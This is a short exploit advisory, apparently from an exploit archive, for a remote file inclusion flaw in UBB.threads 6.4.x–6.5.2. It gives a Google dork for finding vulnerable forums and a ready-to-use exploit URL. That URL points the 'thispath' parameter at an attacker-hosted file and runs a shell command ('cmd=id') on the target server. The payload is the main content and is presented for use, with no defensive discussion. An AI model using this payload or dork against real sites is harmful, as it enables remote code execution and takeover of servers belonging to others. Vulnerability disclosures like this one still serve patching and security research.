id: 436
date: 05/21/2006
title: UBB Threads 6.4.x-6.5.2 (thispath) Remote File Inclusion Vulnerability
author: V4mu
cves: 

======================================================================
UBB Threads 6.4.x-6.5.2 (thispath) Remote File Inclusion Vulnerability
======================================================================



Anomaly 1n The System presents
UBB.threads >= 6.4.x Remote File Inclusion
 
founded by V4mu in 04/20/2006

URL: http://www.ubbcentral.com
Google dork: allinurl:"/ubbthreads/"

exploit:
/addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id
 
contact: irc.gigachat.net #A1TS



#  0day.today [2023-03-25]  #